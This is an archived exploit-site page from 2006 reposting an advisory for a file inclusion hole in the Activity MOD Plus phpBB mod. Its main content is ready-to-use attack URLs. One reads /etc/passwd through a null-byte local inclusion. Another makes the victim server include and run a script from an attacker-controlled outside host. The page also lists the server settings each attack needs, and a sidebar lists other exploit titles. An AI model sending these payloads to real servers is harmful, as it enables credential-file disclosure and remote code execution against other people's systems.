exploits , vulnerabilities , articles , Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability

2006-05-29

Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability

Rated as : High Risk

phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on phpBB 2.x (Activity MOD Plus)
Original advisory can be found at: http://www.nukedx.com/?viewdoc=38

Succesful exploitation needs register_globals on
GET ->
http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
EXAMPLE ->
http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
Requires magic_quotes_gpc off
EXAMPLE ->
http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
Requires allow_url_fopen on
securitydot.net - 2006-05-29

Exploits - newest 10 RSS | More

2007-06-15 57359 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34261 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42501 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29380 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19806 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16744 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19449 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16632 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33655 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17265 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit